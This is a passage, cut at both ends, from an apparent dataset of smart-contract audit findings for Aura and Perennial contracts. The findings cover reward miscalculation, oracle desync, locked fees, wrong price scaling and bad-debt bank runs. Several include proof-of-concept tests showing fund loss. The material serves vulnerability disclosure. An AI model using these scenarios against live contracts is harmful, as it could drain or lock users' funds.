mintAmount = (mintRequestAmount * reduction) / totalCliffs;\\n\\n /// e.g. amtTillMax = 5e25 - 1e25 = 4e25\\n uint256 amtTillMax = emissionMaxSupply - emissionsMinted;\\n if (mintAmount > amtTillMax) {\\n mintAmount = amtTillMax;\\n }\\n }\\n```\\n\\nThe above code is used to calculate the amount of AURA owed to the user. This calculation is perfectly accurate if the AURA hasn't been minted yet. The problem is that each time a user withdraws, AURA is claimed for ALL vault participants. 
This means that the rewards will be realized for a majority of users before they themselves withdraw. Since the emissions decrease with each cliff, there will be loss of funds at the end of each cliff.\\nExample: Assume for simplicity there are only 2 cliffs. User A deposits LP to WAuraPools. After some time User B deposits as well. Before the end of the first cliff User A withdraw. This claims all tokens owed to both users A and B which is now sitting in the contract. Assume both users are owed 10 tokens. Now User B waits for the second cliff to end before withdrawing. When calculating his rewards it will give him no rewards since all cliffs have ended. The issue is that the 10 tokens they are owed is already sitting in the contract waiting to be claimed.","I would recommend a hybrid approach. When rewards are claimed upon withdrawal, the reward per token should be cached to prevent loss of tokens that have already been received by the contract. Only unminted AURA should be handled this way.",All users will lose rewards at the end of each cliff due to miscalculation,```\\n if (cliff < totalCliffs) {\\n /// e.g. (new) reduction = (500 - 100) * 2.5 + 700 = 1700;\\n /// e.g. (new) reduction = (500 - 250) * 2.5 + 700 = 1325;\\n /// e.g. (new) reduction = (500 - 400) * 2.5 + 700 = 950;\\n uint256 reduction = ((totalCliffs - cliff) * 5) / 2 + 700;\\n /// e.g. (new) amount = 1e19 * 1700 / 500 = 34e18;\\n /// e.g. (new) amount = 1e19 * 1325 / 500 = 26.5e18;\\n /// e.g. (new) amount = 1e19 * 950 / 500 = 19e17;\\n mintAmount = (mintRequestAmount * reduction) / totalCliffs;\\n\\n /// e.g. 
amtTillMax = 5e25 - 1e25 = 4e25\\n uint256 amtTillMax = emissionMaxSupply - emissionsMinted;\\n if (mintAmount > amtTillMax) {\\n mintAmount = amtTillMax;\\n }\\n }\\n```\\n +Invalid oracle versions can cause desync of global and local positions making protocol lose funds and being unable to pay back all users,high,"In more details, if there are 2 pending positions with timestamps different by 2 oracle versions and the first of them has invalid oracle version at its timestamp, then there are 2 different position flows possible depending on the time when the position is settled (update transaction called):\\nFor earlier update the flow is: previous position (oracle v1) -> position 1 (oracle v2) -> position 2 (oracle v3)\\nFor later update position 1 is skipped completely (the fees for the position are also not taken) and the flow is: previous position (oracle v1) -> invalidated position 1 (in the other words: previous position again) (oracle v2) -> position 2 (oracle v3)\\nWhile the end result (position 2) is the same, it's possible that pending global position is updated earlier (goes the 1st path), while the local position is updated later (goes the 2nd path). For a short time (between oracle versions 2 and 3), the global position will accumulate everything (including profit and loss) using the pending position 1 long/short/maker values, but local position will accumulate everything using the previous position with different values.\\nConsider the following scenario: Oracle uses granularity = 100. Initially user B opens position maker = 2 with collateral = 100. 
T=99: User A opens long = 1 with collateral = 100 (pending position long=1 timestamp=100) T=100: Oracle fails to commit this version, thus it becomes invalid T=201: At this point oracle version at timestamp 200 is not yet commited, but the new positions are added with the next timestamp = 300: User A closes his long position (update(0,0,0,0)) (pending position: long=1 timestamp=100; long=0 timestamp=300) At this point, current global long position is still 0 (pending the same as user A local pending positions)\\nT=215: Oracle commits version with timestamp = 200, price = $100 T=220: User B settles (update(2,0,0,0) - keeping the same position). At this point the latest oracle version is the one at timestamp = 200, so this update triggers update of global pending positions, and current latest global position is now long = 1.0 at timestamp = 200. T=315: Oracle commits version with timestamp = 300, price = $90 after settlement of both UserA and UserB, we have the following:\\nGlobal position settlement. It accumulates position [maker = 2.0, long = 1.0] from timestamp = 200 (price=$100) to timestamp = 300 (price=$90). In particular: longPnl = 1*($90-$100) = -$10 makerPnl = -longPnl = +$10\\nUser B local position settlement. It accumulates position [maker = 2.0] from timestamp = 200 to timestamp = 300, adding makerPnl ($10) to user B collateral. So user B collateral = $110\\nUser A local position settlement. When accumulating, pending position 1 (long = 1, timestamp = 100) is invalidated to previous position (long = 0) and also fees are set to 0 by invalidation. So user A local accumulates position [long = 0] from timestamp = 0 to timestamp = 300 (next pending position), this doesn't change collateral at all (remains $100). 
Then the next pending position [long = 0] becomes the latest position (basically position of long=1 was completely ignored as if it has not existed).\\nResult: User A deposited $100, User B deposited $100 (total $200 deposited) after the scenario above: User A has collateral $110, User B has collateral $100 (total $210 collateral withdrawable) However, protocol only has $200 deposited. This means that the last user will be unable to withdraw the last $10 since protocol doesn't have it, leading to a user loss of funds.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog global-local desync', async () => {\\n const positionMaker = parse6decimal('2.000')\\n const positionLong = parse6decimal('1.000')\\n const collateral = parse6decimal('100')\\n\\n const oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, oracleVersion.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n const oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\n oracle.status.returns([oracleVersion2, oracleVersion2.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, positionLong, 0, collateral, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(""collateral deposit maker: "" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(""collateral deposit long: "" 
+ info.collateral);\\n\\n // invalid oracle version\\n const oracleVersion3 = {\\n price: 0,\\n timestamp: TIMESTAMP + 200,\\n valid: false,\\n }\\n oracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\n\\n // next oracle version is valid\\n const oracleVersion4 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 300,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion4.timestamp).returns(oracleVersion4)\\n\\n // still returns oracleVersion2, because nothing commited for version 3, and version 4 time has passed but not yet commited\\n oracle.status.returns([oracleVersion2, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // reset to 0\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n // oracleVersion4 commited\\n oracle.status.returns([oracleVersion4, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n\\n const oracleVersion5 = {\\n price: parse6decimal('90'),\\n timestamp: TIMESTAMP + 400,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion5.timestamp).returns(oracleVersion5)\\n oracle.status.returns([oracleVersion5, oracleVersion5.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(""collateral maker: "" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(""collateral long: "" + info.collateral);\\n})\\n```\\n\\nConsole output for the code:\\n```\\ncollateral deposit maker: 100000000\\ncollateral deposit long: 100000000\\ncollateral maker: 110000028\\ncollateral long: 100000000\\n```\\n\\nMaker has a bit more than $110 in the end, because he also earns funding and interest during the short time 
when ephemeral long position is active (but user A doesn't pay these fees).","The issue is that positions with invalid oracle versions are ignored until the first valid oracle version, however the first valid version can be different for global and local positions. One of the solutions I see is to introduce a map of position timestamp -> oracle version to settle, which will be filled by global position processing. Local position processing will follow the same path as global using this map, which should eliminate possibility of different paths for global and local positions.\\nIt might seem that the issue can only happen with exactly 1 oracle version between invalid and valid positions. However, it's also possible that some non-requested oracle versions are commited (at some random timestamps between normal oracle versions) and global position will go via the route like t100[pos0]->t125[pos1]->t144[pos1]->t200[pos2] while local one will go t100[pos0]->t200[pos2] OR it can also go straight to t300 instead of t200 etc. So the exact route can be anything, and local oracle will have to follow it, that's why I suggest a path map.\\nThere might be some other solutions possible.","Any time the oracle skips a version (invalid version), it's likely that global and local positions for different users who try to trade during this time will desync, leading to messed up accounting and loss of funds for users or protocol, potentially triggering a bank run with the last user being unable to withdraw all funds.\\nThe severity of this issue is high, because while invalid versions are normally a rare event, however in the current state of the codebase there is a bug that pyth oracle requests are done using this block timestamp instead of granulated future time (as positions do), which leads to invalid oracle versions almost for all updates (that bug is reported separately). 
Due to this other bug, the situation described in this issue will arise very often by itself in a normal flow of the user requests, so it's almost 100% that internal accounting for any semi-active market will be broken and total user collateral will deviate away from real deposited funds, meaning the user funds loss.\\nBut even with that other bug fixed, the invalid oracle version is a normal protocol event and even 1 such event might be enough to break internal market accounting.","```\\nit('panprog global-local desync', async () => {\\n const positionMaker = parse6decimal('2.000')\\n const positionLong = parse6decimal('1.000')\\n const collateral = parse6decimal('100')\\n\\n const oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, oracleVersion.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n const oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\n oracle.status.returns([oracleVersion2, oracleVersion2.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, positionLong, 0, collateral, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(""collateral deposit maker: "" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(""collateral deposit long: "" + info.collateral);\\n\\n // invalid oracle version\\n const oracleVersion3 = {\\n price: 0,\\n timestamp: TIMESTAMP + 200,\\n valid: 
false,\\n }\\n oracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\n\\n // next oracle version is valid\\n const oracleVersion4 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 300,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion4.timestamp).returns(oracleVersion4)\\n\\n // still returns oracleVersion2, because nothing commited for version 3, and version 4 time has passed but not yet commited\\n oracle.status.returns([oracleVersion2, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // reset to 0\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n // oracleVersion4 commited\\n oracle.status.returns([oracleVersion4, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n\\n const oracleVersion5 = {\\n price: parse6decimal('90'),\\n timestamp: TIMESTAMP + 400,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion5.timestamp).returns(oracleVersion5)\\n oracle.status.returns([oracleVersion5, oracleVersion5.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(""collateral maker: "" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(""collateral long: "" + info.collateral);\\n})\\n```\\n" +Protocol fee from Market.sol is locked,high,"Here is `MarketFactory#fund` function:\\n```\\n function fund(IMarket market) external {\\n if (!instances(IInstance(address(market)))) revert FactoryNotInstanceError();\\n market.claimFee();\\n }\\n```\\n\\nThis is `Market#claimFee` function:\\n```\\n function claimFee() external {\\n Global memory newGlobal = _global.read();\\n\\n if (_claimFee(address(factory()), 
newGlobal.protocolFee)) newGlobal.protocolFee = UFixed6Lib.ZERO;\\n // rest of code\\n }\\n```\\n\\nThis is the internal `_claimFee` function:\\n```\\n function _claimFee(address receiver, UFixed6 fee) private returns (bool) {\\n if (msg.sender != receiver) return false;\\n\\n token.push(receiver, UFixed18Lib.from(fee));\\n emit FeeClaimed(receiver, fee);\\n return true;\\n }\\n```\\n\\nAs we can see, when `MarketFactory#fund` is called, Market#claimFee gets called which will send the protocolFee to msg.sender(MarketFactory). When you check through the MarketFactory contract, there is no place where another address(such as protocol multisig, treasury or an EOA) is approved to spend MarketFactory's funds, and also, there is no function in the contract that can be used to transfer MarketFactory's funds. This causes locking of the protocol fees.",Consider adding a `withdraw` function that protocol can use to get the protocolFee out of the contract. You can have the `withdraw` function transfer the MarketFactory balance to the treasury or something.,Protocol fees cannot be withdrawn,```\\n function fund(IMarket market) external {\\n if (!instances(IInstance(address(market)))) revert FactoryNotInstanceError();\\n market.claimFee();\\n }\\n```\\n +"PythOracle:if price.expo is less than 0, wrong prices will be recorded",high,"Here is PythOracle#_recordPrice function:\\n```\\n function _recordPrice(uint256 oracleVersion, PythStructs.Price memory price) private {\\n _prices[oracleVersion] = Fixed6Lib.from(price.price).mul(\\n Fixed6Lib.from(SafeCast.toInt256(10 ** SafeCast.toUint256(price.expo > 0 ? 
price.expo : -price.expo)))\\n );\\n _publishTimes[oracleVersion] = price.publishTime;\\n }\\n```\\n\\nIf price is 5e-5 for example, it will be recorded as 5e5 If price is 5e-6, it will be recorded as 5e6.\\nAs we can see, there is a massive deviation in recorded price from actual price whenever price's exponent is negative","In PythOracle.sol, `_prices` mapping should not be `mapping(uint256 => Fixed6) private _prices;` Instead, it should be `mapping(uint256 => Price) private _prices;`, where Price is a struct that stores the price and expo:\\n```\\nstruct Price{\\n Fixed6 price,\\n int256 expo\\n}\\n```\\n\\nThis way, the price exponents will be preserved, and can be used to scale the prices correctly wherever it is used.","Wrong prices will be recorded. For example, If priceA is 5e-5, and priceB is 5e-6. But due to the wrong conversion,\\nThere is a massive change in price(5e5 against 5e-5)\\nwe know that priceA is ten times larger than priceB, but priceA will be recorded as ten times smaller than priceB. Unfortunately, current payoff functions may not be able to take care of these discrepancies","```\\n function _recordPrice(uint256 oracleVersion, PythStructs.Price memory price) private {\\n _prices[oracleVersion] = Fixed6Lib.from(price.price).mul(\\n Fixed6Lib.from(SafeCast.toInt256(10 ** SafeCast.toUint256(price.expo > 0 ? 
price.expo : -price.expo)))\\n );\\n _publishTimes[oracleVersion] = price.publishTime;\\n }\\n```\\n" +Vault.sol: `settle`ing the 0 address will disrupt accounting,high,"Within `Vault#_loadContext` function, the context.global is the account of the 0 address, while context.local is the account of the address to be updated or settled:\\n```\\nfunction _loadContext(address account) private view returns (Context memory context) {\\n // rest of code\\n context.global = _accounts[address(0)].read();\\n context.local = _accounts[account].read();\\n context.latestCheckpoint = _checkpoints[context.global.latest].read();\\n}\\n```\\n\\nIf a user settles the 0 address, the global account will be updated with wrong data.\\nHere is the _settle logic:\\n```\\nfunction _settle(Context memory context) private {\\n // settle global positions\\n while (\\n context.global.current > context.global.latest &&\\n _mappings[context.global.latest + 1].read().ready(context.latestIds)\\n ) {\\n uint256 newLatestId = context.global.latest + 1;\\n context.latestCheckpoint = _checkpoints[newLatestId].read();\\n (Fixed6 collateralAtId, UFixed6 feeAtId, UFixed6 keeperAtId) = _collateralAtId(context, newLatestId);\\n context.latestCheckpoint.complete(collateralAtId, feeAtId, keeperAtId);\\n context.global.processGlobal(\\n newLatestId,\\n context.latestCheckpoint,\\n context.latestCheckpoint.deposit,\\n context.latestCheckpoint.redemption\\n );\\n _checkpoints[newLatestId].store(context.latestCheckpoint);\\n }\\n\\n // settle local position\\n if (\\n context.local.current > context.local.latest &&\\n _mappings[context.local.current].read().ready(context.latestIds)\\n ) {\\n uint256 newLatestId = context.local.current;\\n Checkpoint memory checkpoint = _checkpoints[newLatestId].read();\\n context.local.processLocal(\\n newLatestId,\\n checkpoint,\\n context.local.deposit,\\n context.local.redemption\\n );\\n }\\n}\\n```\\n\\nIf settle is called on 0 address, _loadContext will give context.global 
and context.local same data. In the _settle logic, after the global account(0 address) is updated with the correct data in the `while` loop(specifically through the processGlobal function), the global account gets reupdated with wrong data within the `if` statement through the processLocal function.\\nWrong assets and shares will be recorded. The global account's assets and shares should be calculated with toAssetsGlobal and toSharesGlobal respectively, but now, they are calculated with toAssetsLocal and toSharesLocal.\\ntoAssetsGlobal subtracts the globalKeeperFees from the global deposited assets, while toAssetsLocal subtracts globalKeeperFees/Checkpoint.count fees from the local account's assets.\\nSo in the case of settling the 0 address, where global account and local account are both 0 address, within the while loop of _settle function, depositedAssets-globalKeeperFees is recorded for address(0), but then, in the `if` statement, depositedAssets-(globalAssets/Checkpoint.count) is recorded for address(0)\\nAnd within the `Vault#_saveContext` function, context.global is saved before context.local, so in this case, context.global(which is 0 address with correct data) is overridden with context.local(which is 0 address with wrong data).","I believe that the ability to settle the 0 address is intended, so an easy fix is to save local context before saving global context: Before:\\n```\\n function _saveContext(Context memory context, address account) private {\\n _accounts[address(0)].store(context.global);\\n _accounts[account].store(context.local);\\n _checkpoints[context.currentId].store(context.currentCheckpoint);\\n }\\n```\\n\\nAfter:\\n```\\n function _saveContext(Context memory context, address account) private {\\n _accounts[account].store(context.local);\\n _accounts[address(0)].store(context.global);\\n _checkpoints[context.currentId].store(context.currentCheckpoint);\\n }\\n```\\n","The global account will be updated with wrong data, that is, global 
assets and shares will be higher than it should be because lower keeper fees was deducted.",```\\nfunction _loadContext(address account) private view returns (Context memory context) {\\n // rest of code\\n context.global = _accounts[address(0)].read();\\n context.local = _accounts[account].read();\\n context.latestCheckpoint = _checkpoints[context.global.latest].read();\\n}\\n```\\n +"During oracle provider switch, if it is impossible to commit the last request of previous provider, then the oracle will get stuck (no price updates) without any possibility to fix it",medium,"The way oracle provider switch works is the following:\\n`Oracle.update()` is called to set a new provider. This is only allowed if there is no other provider switch pending.\\nThere is a brief transition period, when both the previous provider and a new provider are active. This is to ensure that all the requests made to the previous oracle are commited before switching to a new provider. This is handled by the `Oracle._handleLatest()` function, in particular the switch to a new provider occurs only when `Oracle.latestStale()` returns true. The lines of interest to us are:\\n```\\n uint256 latestTimestamp = global.latest == 0 ? 0 : oracles[global.latest].provider.latest().timestamp;\\n if (uint256(oracles[global.latest].timestamp) > latestTimestamp) return false;\\n```\\n\\n`latestTimestamp` - is the timestamp of last commited price for the previous provider `oracles[global.latest].timestamp` is the timestamp of the last requested price for the previous provider The switch doesn't occur, until last commited price is equal to or after the last request timestamp for the previous provider. 3. The functions to `commit` the price are in PythOracle: `commitRequested` and `commit`. 3.1. `commitRequested` requires publish timestamp of the pyth price to be within MIN_VALID_TIME_AFTER_VERSION..MAX_VALID_TIME_AFTER_VERSION from request time. 
It is possible that pyth price with signature in this time period is not available for different reasons (pyth price feed is down, keeper was down during this period and didn't collect price and signature):\\n```\\n uint256 versionToCommit = versionList[versionIndex];\\n PythStructs.Price memory pythPrice = _validateAndGetPrice(versionToCommit, updateData);\\n```\\n\\n`versionList` is an array of oracle request timestamps. And `_validateAndGetPrice()` filters the price within the interval specified (if it is not in the interval, it will revert):\\n```\\n return pyth.parsePriceFeedUpdates{value: pyth.getUpdateFee(updateDataList)}(\\n updateDataList,\\n idList,\\n SafeCast.toUint64(oracleVersion + MIN_VALID_TIME_AFTER_VERSION),\\n SafeCast.toUint64(oracleVersion + MAX_VALID_TIME_AFTER_VERSION)\\n )[0].price;\\n```\\n\\n3.2. `commit` can not be done with timestamp older than the first oracle request timestamp: if any oracle request is still active, it will simply redirect to commitRequested:\\n```\\n if (versionList.length > nextVersionIndexToCommit && oracleVersion >= versionList[nextVersionIndexToCommit]) {\\n commitRequested(nextVersionIndexToCommit, updateData);\\n return;\\n }\\n```\\n\\nAll new oracle requests are directed to a new provider, this means that previous provider can not receive any new requests (which allows to finalize it):\\n```\\n function request(address account) external onlyAuthorized {\\n (OracleVersion memory latestVersion, uint256 currentTimestamp) = oracles[global.current].provider.status();\\n\\n oracles[global.current].provider.request(account);\\n oracles[global.current].timestamp = uint96(currentTimestamp);\\n _updateLatest(latestVersion);\\n }\\n```\\n\\nSo the following scenario is possible: timestamp=69: oracle price is commited for timestamp=50 timestamp=70: user requests to open position (Oracle.request() is made) timestamp=80: owner calls `Oracle.update()` timestamp=81: pyth price signing service goes offline (or keeper goes 
offline) ... timestamp=120: signing service goes online again. timestamp=121: another user requests to open position (Oracle.request() is made, directed to new provider) timestamp=200: new provider's price is commited (commitRequested is called with timestamp=121)\\nAt this time, `Oracle.latest()` will return price at timestamp=50. It will ignore new provider's latest commit, because previous provider last request (timestamp=70) is still not commited. Any new price requests and commits to a new provider will be ignored, but the previous provider can not be commited due to absence of prices in the valid time range. It is also not possible to change oracle for the market, because there is no such function. It is also impossible to cancel provider update and impossible to change the provider back to previous one, as all of these will revert.\\nIt is still possible for the owner to manually whitelist some address to call `request()` for the previous provider. However, this situation provides even worse result. While the latest version for the previous provider will now be later than the last request, so it will let the oracle switch to new provider, however `oracle.status()` will briefly return invalid oracle version, because it will return oracle version at the timestamp = last request before the provider switch, which will be invalid (the new request will be after that timestamp):\\nThis can be abused by some user who can backrun the previous provider oracle commit (or commit himself) and use the invalid oracle returned by `status()` (oracle version with price = 0). Market doesn't expect the oracle status to return invalid price (it is expected to be always valid), so it will use this invalid price as if it's a normal price = 0, which will totally break the market:\\nSo if the oracle provider switch becomes stuck, there is no way out and the market will become stale, not allowing any user to withdraw the funds.","There are multiple possible ways to fix this. 
For example, allow to finalize previous provider if the latest `commit` from the new provider is newer than the latest `commit` from the previous provider by `GRACE_PERIOD` seconds. Or allow PythOracle to `commit` directly (instead of via commitRequested) if the `commit` oracleVersion is newer than the last request by `GRACE_PERIOD` seconds.","Issue During oracle provider switch, if it is impossible to commit the last request of previous provider, then the oracle will get stuck (no price updates) without any possibility to fix it\\nSwitching oracle provider can make the oracle stuck and stop updating new prices. This will mean the market will become stale and will revert on all requests from user, disallowing to withdraw funds, bricking the contract entirely.",```\\n uint256 latestTimestamp = global.latest == 0 ? 0 : oracles[global.latest].provider.latest().timestamp;\\n if (uint256(oracles[global.latest].timestamp) > latestTimestamp) return false;\\n```\\n +Bad debt (shortfall) liquidation leaves liquidated user in a negative collateral balance which can cause bank run and loss of funds for the last users to withdraw,medium,"Consider the following scenario:\\nUser1 and User2 are the only makers in the market each with maker=50 position and each with collateral=500. (price=$100)\\nA new user comes into the market and opens long=10 position with collateral=10.\\nPrice drops to $90. Some liquidator liquidates the user, taking $10 liquidation fee. User is now left with the negative collateral = -$100\\nSince User1 and User2 were the other party for the user, each of them has a profit of $50 (both users have collateral=550)\\nAt this point protocol has total funds from deposit of User1($500) + User2($500) + new user($10) - liquidator($10) = $1000. However, User1 and User2 have total collateral of 1100.\\nUser1 closes position and withdraws $550. This succeeds. 
Protocol now has only $450 funds remaining and 550 collateral owed to User2.\\nUser2 closes position and tries to withdraw $550, but fails, because protocol doesn't have enough funds. User2 can only withdraw $450, effectively losing $100.\\nSince all users know about this feature, after bad debt they will race to be the first to withdraw, triggering a bank run.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog bad debt liquidation bankrun', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.01'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n 
makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('500')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n dsu.transferFrom.whenCalledWith(userC.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userC).update(userC.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('10')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('10.000'), 0, collateral, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(""collateral before liquidation: "" + info.collateral + "" + "" + infoB.collateral + "" + "" + infoC.collateral + "" = "" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n // liquidate\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('10')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(user.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n await 
market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n await market.connect(userC).update(userC.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(""collateral after liquidation: "" + info.collateral + "" + "" + infoB.collateral + "" + "" + infoC.collateral + "" = "" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n})\\n```\\n\\nConsole output for the code:\\n```\\ncollateral before liquidation: 10000000 + 500000000 + 500000000 = 1010000000\\ncollateral after liquidation: -100000080 + 550000000 + 550000000 = 999999920\\n```\\n\\nAfter initial total deposit of $1010, in the end liquidated user will just abandon his account, and remaining user accounts have $550+$550=$1100 but only $1000 funds in the protocol to withdraw.","There should be no negative collateral accounts with 0-position and no incentive to cover shortfall. When liquidated, if account is left with negative collateral, the bad debt should be added to the opposite position pnl (long position bad debt should be socialized between short position holders) or maybe to makers pnl only (socialized between makers). The account will have to be left with collateral = 0.\\nImplementation details for such solution can be tricky due to settlement in the future (pnl is not known at the time of liquidation initiation). Possibly a 2nd step of bad debt liquidation should be added: a keeper will call the user account to socialize bad debt and get some reward for this. Although this is not the best solution, because users who close their positions before the keeper socializes the bad debt, will be able to avoid this social loss. 
One of the solutions for this will be to introduce delayed withdrawals and delayed socialization (like withdrawals are allowed only after 5 oracle versions and socialization is applied to all positions opened before socialization and still active or closed within 5 last oracle versions), but it will make protocol much more complicated.","After ANY bad debt, the protocol collateral for all non-negative users will be higher than protocol funds available, which can cause a bank run and a loss of funds for the users who are the last to withdraw.\\nEven if someone covers the shortfall for the user with negative collateral, this doesn't guarantee absence of bank run:\\nIf the shortfall is not covered quickly for any reason, the other users can notice disparency between collateral and funds in the protocol and start to withdraw\\nIt is possible that bad debt is so high that any entity (""insurance fund"") just won't have enough funds to cover it.","```\\nit('panprog bad debt liquidation bankrun', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.01'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n 